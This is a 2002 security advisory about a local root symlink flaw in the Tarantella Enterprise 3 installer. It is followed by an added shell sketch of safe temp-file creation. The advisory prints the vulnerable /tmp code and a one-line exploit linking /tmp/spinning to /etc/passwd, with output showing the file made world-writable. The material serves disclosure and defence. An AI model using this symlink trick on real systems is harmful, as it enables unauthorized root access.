From: Larry W. Cashdollar (lwcvapid.dhs.org)
Date: Tue Feb 19 2002 - 07:22:55 CST

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

                            Larry W. Cashdollar
                                Vapid Labs
                                2/18/2002

    Another local root vulnerability during installation of Tarantella
    Enterprise 3.

    During installation a "twirling / \ | - " text graphic is displayed (you
    remember them from the shareware games in DOS days..). They create a file
    in /tmp called spinning to determine what state the installation is at.
    The file's permissions are changed to read, write and execute for all, and
    the file is removed and recreated during different stages of the
    installation. It is vulnerable to a simple symlink attack.

    Problem Code:
    <----snip---->
    touch /tmp/spinning >/dev/null 2>&1
    chmod 777 /tmp/spinning >/dev/null 2>&1
    <----snip---->

    Exploit:
    There is no race condition here, just create the link.

    [lwcmisery] ln -s /etc/passwd /tmp/spinning

    Wait until root is done installing...

    [lwcmisery] ls -l /etc/passwd
    -rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd

    Recommendations:
    I again recommend the target system is running in single user mode before this
    software is installed.

    The vendor has been notified and plans to fix this in the next release.

    http://vapid.dhs.org
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (FreeBSD)
    Comment: For info see http://www.gnupg.org

    iD8DBQE8clFP1hSQ6Gxh/KoRAtQWAKCOod+43+rYbvc0pmw2ZnPZ5pDsqwCcD18m
    w80GBUP5ejW31415uXSVmGg=
    =U3gs
    -----END PGP SIGNATURE-----
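
The "Problem Code" in the advisory uses a fixed name in /tmp and then runs chmod 777 on it, so both commands act on whatever the name points to. The following is an added example, not part of the original advisory and not the vendor's fix: a shell sketch of creating the same status file inside a private `mktemp -d` directory with exclusive creation. The function names, the `install.XXXXXX` template and the sandbox files are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not vendor code): status-file creation that does not act on
# a link planted in a world-writable directory.

# Create PATH only if nothing is there yet; the resulting mode is 0600.
create_exclusive() (
    umask 077   # owner-only permissions instead of chmod 777
    set -C      # noclobber: '>' will not overwrite an existing file,
                # whether named directly or reached through a symlink
    : > "$1"
)

# Create a private 0700 directory with an unpredictable name and put the
# status file inside it. Prints the file path. BASE defaults to $TMPDIR or /tmp.
make_status_file() (
    base=${1:-${TMPDIR:-/tmp}}
    dir=$(mktemp -d "$base/install.XXXXXX") || exit 1
    create_exclusive "$dir/spinning" || exit 1
    printf '%s\n' "$dir/spinning"
)

# Demo in a constructed sandbox: "target" stands in for a root-owned file.
demo() {
    sandbox=$(mktemp -d) || return 1
    echo "stand-in for a sensitive file" > "$sandbox/target"
    ln -s "$sandbox/target" "$sandbox/spinning"      # pre-existing link
    if create_exclusive "$sandbox/spinning" 2>/dev/null; then
        echo "link was followed"
    else
        echo "refused: path already exists"
    fi
    ls -l "$sandbox/target"                          # mode is unchanged
    f=$(make_status_file "$sandbox") && ls -l "$f"   # private status file
    rm -rf "$sandbox"
}
demo
```

The private directory is the main protection, since no other local user can create names inside it; the noclobber redirect is a second check in case the path is ever moved back to a shared location.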